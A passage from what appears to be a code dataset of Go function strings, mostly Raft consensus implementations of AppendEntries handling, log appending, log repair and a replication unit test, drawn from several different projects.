sendAppendEntriesRPC() {\n\tappEntriesObj := r.prepAppendEntriesReq() //prepare AppendEntries object\n\n\tappEntriesObjSlice := make([]interface{}, len(appEntriesObj))\n\t//fmt.Println(\"Prep AE_RPC is:\", appEntriesObj)\n\t//Copy to new slice created--This is the method to send a []interface to []TypeX\n\tfor i, d := range appEntriesObj {\n\t\tappEntriesObjSlice[i] = d\n\t}\n\tr.sendToAll_AppendReq(appEntriesObjSlice) //send AppendEntries to all the followers\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func (s *PersistentState) UpdateAndAppendLogFragile(elements []*rpc.LogEntry) {\n\tlg.Log.Debugf(\"old log: %s\", s.Log)\n\n\tfirstNewElementIndex := 0\n\n\t// remove all inconsistent elements\n\tfor i, element := range elements {\n\t\tif len(s.Log) > int(element.Index) {\n\t\t\tif element.Term != s.Log[element.Index].Term {\n\t\t\t\tfirstNewElementIndex = i\n\t\t\t\ts.Log = s.Log[:element.Index]\n\t\t\t\tbreak\n\t\t\t} else {\n\t\t\t\tfirstNewElementIndex = i + 1\n\t\t\t}\n\t\t}\n\t}\n\n\t// add all new elements\n\tif firstNewElementIndex < len(elements) {\n\t\tlg.Log.Debugf(\"Adding following entries to log: %v\", elements[firstNewElementIndex:])\n\t\ts.Log = append(s.Log, elements[firstNewElementIndex:]...)\n\t}\n\n\tlg.Log.Debugf(\"new log: %s\", s.Log)\n}", "func (r *Raft) AppendToLog_Leader(cmd []byte) {\n\tterm := r.currentTerm\n\tlogVal := LogVal{term, cmd, 0} //make object for log's value field with acks set to 0\n\t//fmt.Println(\"Before putting in log,\", logVal)\n\tr.myLog = append(r.myLog, logVal)\n\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Added cmd to my log\")\n\n\t//modify metadata after appending\n\t//fmt.Println(\"Metadata before appending,lastLogIndex,prevLogIndex,prevLogTerm\", r.myMetaData.lastLogIndex, r.myMetaData.prevLogIndex, r.myMetaData.prevLogTerm)\n\tlastLogIndex := r.myMetaData.lastLogIndex + 1\n\tr.myMetaData.prevLogIndex = r.myMetaData.lastLogIndex\n\tr.myMetaData.lastLogIndex = lastLogIndex\n\t//fmt.Println(r.myId(), \"Length of my log is\", len(r.myLog))\n\tif len(r.myLog) == 1 {\n\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1 //as for empty log prevLogTerm is -2\n\n\t} else if len(r.myLog) > 1 { //explicit check, else would have sufficed too, just to eliminate len=0 possibility\n\t\tr.myMetaData.prevLogTerm = r.myLog[r.myMetaData.prevLogIndex].Term\n\t}\n\t//r.currentTerm = term\n\t//fmt.Println(\"I am leader, Appended to log, last index, its term is\", r.myMetaData.lastLogIndex, r.myLog[lastLogIndex].term)\n\t//fmt.Println(\"Metadata after appending,lastLogIndex,prevLogIndex,prevLogTerm\", r.myMetaData.lastLogIndex, r.myMetaData.prevLogIndex, r.myMetaData.prevLogTerm)\n\tr.setNextIndex_All() //Added-28 march for LogRepair\n\t//Write to disk\n\t//fmt.Println(r.myId(), \"In append_leader, appended to log\", string(cmd))\n\tr.WriteLogToDisk()\n\n}", "func (s *server) processAppendEntriesRequest(req *AppendEntriesRequest) (*AppendEntriesResponse, bool) {\n\ts.traceln(\"server.ae.process\")\n\n\tif req.Term < s.currentTerm {\n\t\ts.debugln(\"server.ae.error: stale term\")\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), false\n\t}\n\n\tif req.Term == s.currentTerm {\n\t\t// change state to follower\n\t\ts.state = Follower\n\t\t// discover new leader when candidate\n\t\t// save leader name when follower\n\t\ts.leader = req.LeaderName\n\t} else {\n\t\t// Update term and leader.\n\t\ts.updateCurrentTerm(req.Term, req.LeaderName)\n\t}\n\n\t// Reject if log doesn't contain a matching previous entry.\n\tif err := s.log.truncate(req.PrevLogIndex, req.PrevLogTerm); err != nil {\n\t\ts.debugln(\"server.ae.truncate.error: \", err)\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), true\n\t}\n\n\t// Append entries to the log.\n\tif err := s.log.appendEntries(req.Entries); err != nil {\n\t\ts.debugln(\"server.ae.append.error: \", err)\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), true\n\t}\n\n\t// Commit up to the commit index.\n\tif err := s.log.setCommitIndex(req.CommitIndex); err != nil {\n\t\ts.debugln(\"server.ae.commit.error: \", err)\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), true\n\t}\n\n\t// once the server appended and committed all the log entries from the leader\n\n\treturn newAppendEntriesResponse(s.currentTerm, true, s.log.currentIndex(), s.log.CommitIndex()), true\n}", "func (r *Raft) LogRepair(response AppendEntriesResponse) {\n\tid := response.followerId\n\t//fmt.Println(\"In log repair for \", id)\n\tfailedIndex := r.myMetaData.nextIndexMap[id]\n\tvar nextIndex int\n\t//fmt.Println(\"Failed index is:\", failedIndex)\n\tif failedIndex != 0 {\n\t\tnextIndex = failedIndex - 1 //decrementing follower's nextIndex\n\n\t} else { //if nextIndex is 0 means, follower doesn't have first entry (of leader's log),so decrementing should not be done, so retry the same entry again!\n\t\tnextIndex = failedIndex\n\t}\n\t//Added--3:38-23 march\n\tr.myMetaData.nextIndexMap[id] = nextIndex\n\t//fmt.Println(\"I am\", response.followerId, \"My Old and new NI are\", failedIndex, nextIndex)\n\treturn\n}", "func (r *Raft) prepAppendEntriesReq() (appendEntriesReqArray [noOfServers]AppendEntriesReq) {\n\tfor i := 0; i < noOfServers; i++ {\n\t\tif i != r.Myconfig.Id {\n\t\t\tnextIndex := r.myMetaData.nextIndexMap[i] //read the nextIndex to be sent from map\n\t\t\tleaderId := r.LeaderConfig.Id\n\t\t\tvar entries []byte\n\t\t\tvar term, prevLogIndex, prevLogTerm int\n\n\t\t\t//if len(r.myLog) != 0 { //removed since, in case of decrementing nextIndexes for log repair, log length is never zero but nextIndex becomes -1\n\t\t\tif nextIndex >= 0 { //this is AE request with last entry sent (this will be considered as HB when log of follower is consistent)\n\t\t\t\t//fmt.Println(\"Next index is\", nextIndex, \"for server\", i)\n\t\t\t\tterm = r.myLog[nextIndex].Term\n\t\t\t\tentries = r.myLog[nextIndex].Cmd //entry to be replicated\n\t\t\t\tprevLogIndex = nextIndex - 1 //should be changed to nextIndex-1\n\t\t\t\tif nextIndex == 0 {\n\t\t\t\t\tprevLogTerm = -1 //since indexing will be log[-1] so it must be set explicitly\n\t\t\t\t} else {\n\t\t\t\t\tprevLogTerm = r.myLog[prevLogIndex].Term //this is the way to get new prevLogTerm to be sent\n\t\t\t\t}\n\n\t\t\t} else { //so this is prepReq for heartbeat for empty as nextIndex is -1\n\t\t\t\t//when log is empty indexing to log shouldn't be done hence copy old values\n\t\t\t\tterm = r.currentTerm\n\t\t\t\tentries = nil\n\t\t\t\tprevLogIndex = r.myMetaData.prevLogIndex\n\t\t\t\tprevLogTerm = r.myMetaData.prevLogTerm\n\t\t\t}\n\n\t\t\tleaderCommitIndex := r.myMetaData.commitIndex\n\t\t\tleaderLastLogIndex := r.myMetaData.lastLogIndex\n\t\t\tappendEntriesObj := AppendEntriesReq{term, leaderId, prevLogIndex, prevLogTerm, entries, leaderCommitIndex, leaderLastLogIndex}\n\t\t\tappendEntriesReqArray[i] = appendEntriesObj\n\t\t}\n\n\t}\n\treturn appendEntriesReqArray\n\n}", "func (r *Raft) AppendToLog_Leader(cmd []byte) {\n\tTerm := r.myCV.CurrentTerm\n\tlogVal := LogVal{Term, cmd, 0} //make object for log's value field with acks set to 0\n\tr.MyLog = append(r.MyLog, logVal)\n\t//modify metaData after appending\n\tLastLogIndex := r.MyMetaData.LastLogIndex + 1\n\tr.MyMetaData.PrevLogIndex = r.MyMetaData.LastLogIndex\n\tr.MyMetaData.LastLogIndex = LastLogIndex\n\tif len(r.MyLog) == 1 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyMetaData.PrevLogTerm + 1 //as for empty log PrevLogTerm is -2\n\n\t} else if len(r.MyLog) > 1 { //explicit check, else would have sufficed too, just to eliminate len=0 possibility\n\t\tr.MyMetaData.PrevLogTerm = r.MyLog[r.MyMetaData.PrevLogIndex].Term\n\t}\n\tr.setNextIndex_All() //Added-28 march for LogRepair\n\tr.WriteLogToDisk()\n\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n lastLogIndex := 0\n isLeader := true\n \n // TODO WED: check corner cases with -1\n rf.mu.Lock()\n term := rf.currentTerm\n myId := rf.me\n if len(rf.log) > 0 {\n lastLogIndex = len(rf.log)\n //term = rf.log[index].Term \n }\n \n if rf.state != Leader || rf.killed() {\n return lastLogIndex-1, term, false\n }\n \n var oneEntry LogEntry\n oneEntry.Command = command\n oneEntry.Term = term\n \n rf.log = append(rf.log, oneEntry)\n rf.mu.Unlock()\n\n \n go func() {\n \n // Add a while loop. when successReply count greater than threhsold, commit. loop breaks when successReply is equal to peers\n // the for loop inside only iterates over the left peers.\n \n var localMu sync.Mutex\n \n isLeader := true\n committed := false\n successReplyCount := 0\n var receivedResponse []int\n receivedResponse = append(receivedResponse, myId)\n\n for isLeader {\n if rf.killed() {\n fmt.Printf(\"*** Peer %d term %d: Terminated. Closing all outstanding Append Entries calls to followers.\",myId, term)\n return \n }\n\n var args = AppendEntriesArgs {\n LeaderId: myId,\n }\n rf.mu.Lock()\n numPeers := len(rf.peers)\n rf.mu.Unlock()\n\n for id := 0; id < numPeers && isLeader; id++ {\n if (!find(receivedResponse,id)) {\n if lastLogIndex < rf.nextIndex[id] {\n successReplyCount++\n receivedResponse = append(receivedResponse,id)\n continue\n }\n var logEntries []LogEntry\n logEntries = append(logEntries,rf.log[(rf.nextIndex[id]):]...)\n args.LogEntries = logEntries\n args.PrevLogTerm = rf.log[rf.nextIndex[id]-1].Term\n args.PrevLogIndex = rf.nextIndex[id]-1\n args.LeaderTerm = rf.currentTerm\n args.LeaderCommitIndex = rf.commitIndex\n \n go func(serverId int) {\n var reply AppendEntriesReply\n ok:=rf.sendAppendEntries(serverId, &args, &reply)\n if !rf.CheckTerm(reply.CurrentTerm) {\n localMu.Lock()\n isLeader=false\n localMu.Unlock()\n } else if reply.Success && ok {\n localMu.Lock()\n successReplyCount++\n receivedResponse = append(receivedResponse,serverId)\n localMu.Unlock()\n rf.mu.Lock()\n if lastLogIndex >= rf.nextIndex[id] {\n rf.matchIndex[id]= lastLogIndex\n rf.nextIndex[id] = lastLogIndex + 1\n }\n rf.mu.Unlock()\n } else {\n rf.mu.Lock()\n rf.nextIndex[id]-- \n rf.mu.Unlock()\n }\n } (id)\n }\n }\n \n fmt.Printf(\"\\nsleeping before counting success replies\\n\")\n time.Sleep(time.Duration(RANDOM_TIMER_MIN*time.Millisecond))\n\n if !committed && isLeader {\n votesForIndex := 0\n N := math.MaxInt32\n rf.mu.Lock()\n for i := 0; i < numPeers; i++ {\n if rf.matchIndex[i] > rf.commitIndex {\n if rf.matchIndex[i] < N {\n N = rf.matchIndex[i]\n }\n votesForIndex++\n }\n }\n rf.mu.Unlock()\n\n\n if (votesForIndex > (numPeers/2)){ \n go func(){\n committed = true\n rf.mu.Lock()\n rf.commitIndex = N // Discuss: 3. should we use lock?\n rf.log[N].Term = rf.currentTerm\n if rf.commitIndex >= lastLogIndex {\n var oneApplyMsg ApplyMsg\n oneApplyMsg.CommandValid = true\n oneApplyMsg.CommandIndex = lastLogIndex\n oneApplyMsg.Command = command\n go func() {rf.applyCh <- oneApplyMsg} ()\n }\n rf.mu.Unlock()\n }()\n }\n } else if successReplyCount == numPeers {\n return\n } \n }\n } ()\n \n // Your code here (2B code).\n return lastLogIndex, term, isLeader\n}", "func (r *Raft) prepAppendEntriesReq() (appendEntriesReqArray [noOfServers]AppendEntriesReq) {\n\tfor i := 0; i < noOfServers; i++ {\n\t\tif i != r.Myconfig.Id {\n\t\t\tLeaderId := r.LeaderConfig.Id\n\t\t\tvar Entries []byte\n\t\t\tvar Term, PrevLogIndex, PrevLogTerm, LeaderLastLogTerm int\n\t\t\tnextIndex := r.f_specific[i].nextIndex //read the nextIndex to be sent from map\n\t\t\tif nextIndex >= 0 { //this is AE request with last entry sent (this will be considered as HB when log of follower is consistent)\n\t\t\t\tEntries = r.MyLog[nextIndex].Cmd //entry to be replicated\n\t\t\t\tLeaderLastLogTerm = r.MyLog[nextIndex].Term\n\t\t\t\tPrevLogIndex = nextIndex - 1 //should be changed to nextIndex-1\n\t\t\t\tif nextIndex == 0 {\n\t\t\t\t\tPrevLogTerm = -1 //since indexing will be log[-1] so it must be set explicitly\n\t\t\t\t} else {\n\t\t\t\t\tPrevLogTerm = r.MyLog[PrevLogIndex].Term //this is the way to get new PrevLogTerm to be sent\n\t\t\t\t}\n\t\t\t} else { //so this is prepReq for heartbeat for empty log as nextIndex is -1\n\t\t\t\t//when log is empty indexing to log shouldn't be done hence copy old values\n\t\t\t\tEntries = nil\n\t\t\t\tLeaderLastLogTerm = -1\n\t\t\t\tPrevLogIndex = r.MyMetaData.PrevLogIndex\n\t\t\t\tPrevLogTerm = r.MyMetaData.PrevLogTerm\n\t\t\t}\n\t\t\tTerm = r.myCV.CurrentTerm\n\t\t\tLeaderCommitIndex := r.MyMetaData.CommitIndex\n\t\t\tLeaderLastLogIndex := r.MyMetaData.LastLogIndex\n\t\t\tappendEntriesObj := AppendEntriesReq{Term, LeaderId, PrevLogIndex, PrevLogTerm, Entries, LeaderCommitIndex, LeaderLastLogIndex, LeaderLastLogTerm}\n\t\t\tappendEntriesReqArray[i] = appendEntriesObj\n\n\t\t}\n\n\t}\n\treturn appendEntriesReqArray\n\n}", "func (m *MemoryLogger) Append(newEntry LogEntry) {\n\tm.mutex.Lock()\n\tdefer m.mutex.Unlock()\n\tm.Entries[m.index] = newEntry\n\tm.index = (m.index + 1) % maxLogItems\n}", "func (r *Raft) serviceAppendEntriesReq(request AppendEntriesReq, HeartBeatTimer *time.Timer, waitTime int, state int) int {\n\t//replicates entry wise , one by one\n\tbecomeFollower := false //for candidate caller only\n\twaitTime_msecs := msecs * time.Duration(waitTime)\n\tappEntriesResponse := AppendEntriesResponse{} //make object for responding to leader\n\tappEntriesResponse.FollowerId = r.Myconfig.Id\n\tappEntriesResponse.Success = false //false by default\n\tappEntriesResponse.IsHeartBeat = false //by default\n\tvar myLastIndexTerm, myLastIndex int\n\tmyLastIndex = r.MyMetaData.LastLogIndex\n\tif request.Term >= r.myCV.CurrentTerm { //valid leader\n\t\tleaderId := request.LeaderId\n\t\tr.UpdateLeaderInfo(leaderId) //update leader info\n\t\tif request.Term > r.myCV.CurrentTerm {\n\t\t\tr.myCV.CurrentTerm = request.Term //update self Term\n\t\t\tr.myCV.VotedFor = -1 //update votedfor whenever CT is changed\n\t\t\tr.WriteCVToDisk()\n\t\t}\n\t\tif state == follower {\n\t\t\tHeartBeatTimer.Reset(waitTime_msecs) //reset the timer if this is HB or AE req from valid leader\n\t\t}\n\t\tif len(r.MyLog) == 0 { //if log is empty\n\t\t\tmyLastIndexTerm = -1\n\t\t} else {\n\t\t\tmyLastIndexTerm = r.MyLog[myLastIndex].Term\n\t\t}\n\t\t//This is a HB,here log is empty on both sides so Term must not be checked (as leader has incremented its Term due to elections)\n\t\tif request.Entries == nil {\n\t\t\tif len(r.MyLog) == 0 { //just to be sure ===must be satisfied otherwise leader is invalid and logic bug is there.\n\t\t\t\tappEntriesResponse.Success = true\n\t\t\t\tappEntriesResponse.IsHeartBeat = true\n\t\t\t\tbecomeFollower = true\n\t\t\t}\n\t\t} else { //log has Data so-- for heartbeat, check the index and Term of last entry\n\t\t\tif request.LeaderLastLogIndex == myLastIndex && request.LeaderLastLogTerm == myLastIndexTerm {\n\t\t\t\t//this is heartbeat as last entry is already present in self log\n\t\t\t\tappEntriesResponse.Success = true\n\t\t\t\tappEntriesResponse.IsHeartBeat = true\n\t\t\t\tr.MyMetaData.CommitIndex = request.LeaderCommitIndex //update the CI for last entry that leader got majority acks for!\n\t\t\t\tbecomeFollower = true\n\t\t\t} else { //this is not a heartbeat but append request\n\t\t\t\tif request.PrevLogTerm == myLastIndexTerm && request.PrevLogIndex == myLastIndex { //log is consistent except new entry\n\t\t\t\t\tbecomeFollower = true\n\t\t\t\t\tif state == follower { //when caller is follower then only append to log\n\t\t\t\t\t\tr.AppendToLog_Follower(request) //append to log\n\t\t\t\t\t\tappEntriesResponse.Success = true\n\t\t\t\t\t\tappEntriesResponse.IsHeartBeat = false\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\tappEntriesResponse.Term = r.myCV.CurrentTerm\n\tappEntriesResponse.LastLogIndex = r.MyMetaData.LastLogIndex\n\tr.send(request.LeaderId, appEntriesResponse)\n\tif state == candidate && becomeFollower { //this is candidate call\n\t\treturn follower\n\t} else {\n\t\treturn -1\n\t}\n}", "func (c *Cache) appendEntries(topic, key string, entries Entries, new bool) error {\n\tt, ok := c.topics.Load(topic)\n\tif !ok {\n\t\treturn errors.New(\"Topic does not exist\")\n\t}\n\ttop := t.(*Topic)\n\n\tp, ok := top.partitions.Load(key)\n\tif !ok {\n\t\tnewPart, err := c.newPartition(topic, key)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\ttop.partitions.Store(key, newPart)\n\t\tp = newPart\n\t\tc.router.Update(topic, key, AddPartition)\n\t}\n\tpartition := p.(*Partition)\n\n\tpartition.mu.Lock()\n\tdefer partition.mu.Unlock()\n\tfpos := partition.clog.Tell()\n\n\tvar (\n\t\tfirstAppend *int\n\t\tlastEntry *Entry\n\t\tlastTime time.Time\n\t)\n\tif len(partition.entries) > 0 {\n\t\tlastEntry = partition.entries[len(partition.entries)-1]\n\t\tlastTime = lastEntry.Timestamp\n\t}\n\n\tfor i, entry := range entries {\n\t\tif entry.Timestamp.IsZero() {\n\t\t\t// maybe we want to error out in some cases in the future.\n\t\t\tentry.Timestamp = time.Now()\n\t\t\tif entry.Timestamp.Equal(lastTime) {\n\t\t\t\t// make sure it is unique (in some platform like play.golang.org,\n\t\t\t\t// time.Now() is second-precision)\n\t\t\t\tentry.Timestamp = entry.Timestamp.Add(time.Duration(1))\n\t\t\t}\n\t\t\tlastTime = entry.Timestamp\n\t\t}\n\n\t\tif i > 0 {\n\t\t\tlastEntry = entries[i-1]\n\t\t}\n\t\t// the behavior is to discard the entries that are before the latest\n\t\t// entry in the partition. if other entries in the request are after\n\t\t// though, they are still appended.\n\t\tif lastEntry != nil && entry.Timestamp.Before(lastEntry.Timestamp) {\n\t\t\tcontinue\n\t\t}\n\t\tif firstAppend == nil {\n\t\t\ttmp := i\n\t\t\tfirstAppend = &tmp\n\t\t}\n\t\tif new {\n\t\t\tif err := partition.clog.Append(&commitlog.Entry{\n\t\t\t\tTimestamp: entry.Timestamp,\n\t\t\t\tData: entry.Data}); err != nil {\n\t\t\t\tlog.Error(\"Failed to persist %v: %v\", entry, err)\n\t\t\t\tpartition.clog.Truncate(fpos)\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\tif firstAppend != nil {\n\t\tpartition.entries = append(partition.entries, entries[*firstAppend:]...)\n\t} else {\n\t\treturn errors.New(\"Nothing new to append\")\n\t}\n\n\tc.LastCommit = CacheCommit{\n\t\tKey: fmt.Sprintf(\"%v_%v\", topic, key),\n\t\tTimestamp: entries[entries.Len()-1].Timestamp,\n\t}\n\treturn nil\n}", "func (r *Raft) AppendEntry(msg string) int {\n\tr.Log = append(r.Log, fmt.Sprintf(\"%d,%s\", r.CurrentTerm, msg))\n\treturn r.GetLastLogIndex()\n}", "func (remote *RemoteNode) AppendEntriesRPC(local *RemoteNode, request *AppendEntriesRequest) (*AppendEntriesReply, error) {\n\t// if local.NetworkPolicy.IsDenied(*local.Self, *remote) {\n\t// \treturn nil, ErrorNetworkPolicyDenied\n\t// }\n\n\tcc, err := remote.RaftRPCClientConn()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treply, err := cc.AppendEntriesCaller(context.Background(), request)\n\treturn reply, remote.connCheck(err)\n}", "func (t transporter) SendAppendEntriesRequest(server *raft.Server, peer *raft.Peer, req *raft.AppendEntriesRequest) *raft.AppendEntriesResponse {\n\tvar aersp *raft.AppendEntriesResponse\n\tvar b bytes.Buffer\n\tjson.NewEncoder(&b).Encode(req)\n\n\tdebug(\"Send LogEntries to %s \", peer.Name())\n\n\tresp, err := t.Post(fmt.Sprintf(\"%s/log/append\", peer.Name()), &b)\n\n\tif err != nil {\n\t\tdebug(\"Cannot send AppendEntriesRequest to %s : %s\", peer.Name(), err)\n\t}\n\n\tif resp != nil {\n\t\tdefer resp.Body.Close()\n\t\taersp = &raft.AppendEntriesResponse{}\n\t\tif err := json.NewDecoder(resp.Body).Decode(&aersp); err == nil || err == io.EOF {\n\t\t\treturn aersp\n\t\t}\n\n\t}\n\treturn aersp\n}", "func (rf *Raft) sendAllAppendEntriesOrInstallSnapshot() {\n\tAssertF(rf.commitIndex >= rf.snapshotIndex,\n\t\t\"rf.commitIndex {%d} >= rf.snapshotIndex {%d}\",\n\t\trf.commitIndex, rf.snapshotIndex)\n\n\tif rf.status != Leader {\n\t\treturn\n\t}\n\n\tfor i := range rf.peers {\n\t\tif i != rf.me {\n\t\t\trf.sendOneAppendEntriesOrInstallSnapshot(i)\n\t\t}\n\t}\n}", "func (s *storage) appendEntry(e *entry) {\n\tassert(e.index == s.lastLogIndex+1)\n\tw := new(bytes.Buffer)\n\tif err := e.encode(w); err != nil {\n\t\tpanic(bug{fmt.Sprintf(\"entry.encode(%d)\", e.index), err})\n\t}\n\tif err := s.log.Append(w.Bytes()); err != nil {\n\t\tpanic(opError(err, \"Log.Append\"))\n\t}\n\ts.lastLogIndex, s.lastLogTerm = e.index, e.term\n}", "func (r *Raft) serviceAppendEntriesReq(request AppendEntriesReq, HeartBeatTimer *time.Timer, waitTime int) {\n\t//replicates entry wise , one by one\n\twaitTime_secs := secs * time.Duration(waitTime)\n\n\t//fmt.Println(\"Hearbeat came to\", r.Myconfig.Id, \"my and request terms are:\", r.currentTerm, request.term)\n\tappEntriesResponse := AppendEntriesResponse{} //make object for responding to leader\n\tappEntriesResponse.followerId = r.Myconfig.Id\n\tappEntriesResponse.success = false //false by default\n\tappEntriesResponse.isHeartBeat = false //by default\n\tvar myLastIndexTerm, myLastIndex int\n\tmyLastIndex = r.myMetaData.lastLogIndex\n\t//fmt.Println(\"I am\", r.Myconfig.Id, \"checking if valid leader:\", request.leaderId)\n\tif request.term >= r.currentTerm { //valid leader\n\t\t//fmt.Println(\"I am\", r.Myconfig.Id, \"this is valid leader:\", request.leaderId)\n\t\tr.LeaderConfig.Id = request.leaderId //update leader info\n\t\tr.currentTerm = request.term //update self term\n\t\tHeartBeatTimer.Reset(waitTime_secs) //reset the timer if this is HB or AE req from valid leader\n\t\tif len(r.myLog) == 0 { //if log is empty\n\t\t\tmyLastIndexTerm = -1\n\t\t} else {\n\t\t\tmyLastIndexTerm = r.myLog[myLastIndex].Term\n\t\t}\n\t\t//This is a HB,here log is empty on both sides so term must not be checked (as leader has incremented its term due to elections)\n\t\tif request.entries == nil && myLastIndex == request.leaderLastLogIndex {\n\t\t\t//case when first condition is true and 2nd fails wont come,since AE comes from a leader with\n\t\t\t//empty log(hence entries nil) whereas follower has values(2nd condition mismatch)\n\t\t\tappEntriesResponse.success = true\n\t\t\tappEntriesResponse.isHeartBeat = true\n\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Log empty, HB received!(In serviceAppendReq)\")\n\t\t} else { //log has data so-- for hearbeat, check the index and term of last entry\n\t\t\tif request.leaderLastLogIndex == myLastIndex && request.term == myLastIndexTerm {\n\t\t\t\t//this is heartbeat as last entry is already present in self log\n\t\t\t\tappEntriesResponse.success = true\n\t\t\t\tappEntriesResponse.isHeartBeat = true\n\t\t\t\tr.myMetaData.commitIndex = request.leaderCommitIndex //update the CI for last entry that leader got majority acks for!\n\t\t\t\t//fmt.Println(\"I am\", r.Myconfig.Id, \"this is valid leader:\", request.leaderId, \"got HB\", r.myMetaData.commitIndex)\n\t\t\t} else { //this is not a heartbeat but append request\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"This is append request \\n r.currentTerm,mylastTerm,req.prevLogTerm,mylastIndex,req.prevLogIndex\", r.currentTerm, myLastIndexTerm, request.prevLogTerm, myLastIndex, request.prevLogIndex)\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"This is append request\", string(request.entries))\n\t\t\t\t//term and index of self last entry and request's previous entries must be checked\n\t\t\t\t//but what if r.current term has increased to more than the term of last log entry due to repeated elections but no CA req during that time\n\t\t\t\t//so extract the last term from self log--previously it was being compared to r.currentTerm--FAILING NOW--FIXED\n\t\t\t\tif request.prevLogTerm == myLastIndexTerm && request.prevLogIndex == myLastIndex { //log is consistent till now\n\t\t\t\t\t//fmt.Println(\"Log is consistent till now! Going to append new entry\")\n\t\t\t\t\tr.AppendToLog_Follower(request) //append to log\n\t\t\t\t\t//fmt.Println(r.myId(), \"Appended to log,sending true for\", string(request.entries))\n\t\t\t\t\tr.currentTerm = request.term\n\t\t\t\t\tappEntriesResponse.success = true\n\t\t\t\t\tappEntriesResponse.isHeartBeat = false\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tappEntriesResponse.term = r.currentTerm\n\tappEntriesResponse.lastLogIndex = r.myMetaData.lastLogIndex\n\t//fmt.Println(\"Response sent by\", r.Myconfig.Id, \"is :\", appEntriesResponse.success, \"to\", request.leaderId)\n\n\t//fmt.Printf(\"Follower %v sent the AE_ack to %v \\n\", r.Myconfig.Id, request.leaderId)\n\t//Where is it sending to leader's channel??--Added\n\tsend(request.leaderId, appEntriesResponse)\n}", "func (rf *Raft) buildAppendEntriesReplyWhenNotSuccess(reply *AppendEntriesReply, PrevLogIndex int, PrevLogTerm int) {\n\tif PrevLogIndex > rf.getLastIndex() {\n\t\t// this raft do not know about the PrevLogIndex\n\t\treply.SuggestPrevLogIndex = rf.getLastIndex()\n\t\treply.SuggestPrevLogTerm = rf.getLastTerm()\n\t} else {\n\t\t// there is conflict!\n\t\tConflictTerm := rf.getTermForIndex(PrevLogIndex)\n\t\tAssertF(ConflictTerm != PrevLogTerm, \"\")\n\t\tAssertF(PrevLogIndex > rf.commitIndex, \"\")\n\n\t\t// TODO: change to (ConflictTerm, FirstIndex)\n\t\tif ConflictTerm > PrevLogTerm {\n\t\t\t// T1 -- PrevLogTerm, T2 -- ConflictTerm, T1<T2\n\t\t\t// any (i1,t1) in leaders log, if i1<=PrevLogIndex, then t1<=PrevLogTerm\n\t\t\t// Then we find SuggestPrevLogIndex, in tuple (SuggestPrevLogIndex, t2),\n\t\t\t// that satisfies t2<=T1, and SuggestPrevLogIndex is the large one\n\t\t\t// suggestTerm = the max index ( <= PrevLogTerm )\n\t\t\treply.SuggestPrevLogIndex = PrevLogIndex\n\t\t\tfor ; reply.SuggestPrevLogIndex > rf.commitIndex && rf.getTermForIndex(reply.SuggestPrevLogIndex) > PrevLogTerm; reply.SuggestPrevLogIndex-- {\n\t\t\t}\n\t\t\treply.SuggestPrevLogTerm = rf.getTermForIndex(reply.SuggestPrevLogIndex) // term 0 if index 0\n\t\t} else {\n\t\t\treply.SuggestPrevLogIndex = PrevLogIndex - 1\n\t\t\treply.SuggestPrevLogTerm = rf.getTermForIndex(reply.SuggestPrevLogIndex) // term 0 if index 0\n\t\t}\n\n\t\tAssertF(reply.SuggestPrevLogIndex >= rf.commitIndex,\n\t\t\t\"reply.SuggestPrevLogIndex {%d} >= rf.commitIndex {%d}\",\n\t\t\treply.SuggestPrevLogIndex, rf.commitIndex)\n\t}\n\tAssertF(reply.SuggestPrevLogIndex < PrevLogIndex,\n\t\t\"reply.SuggestPrevLogIndex {%d} < PrevLogIndex {%d}\",\n\t\treply.SuggestPrevLogIndex, PrevLogIndex)\n}", "func (a 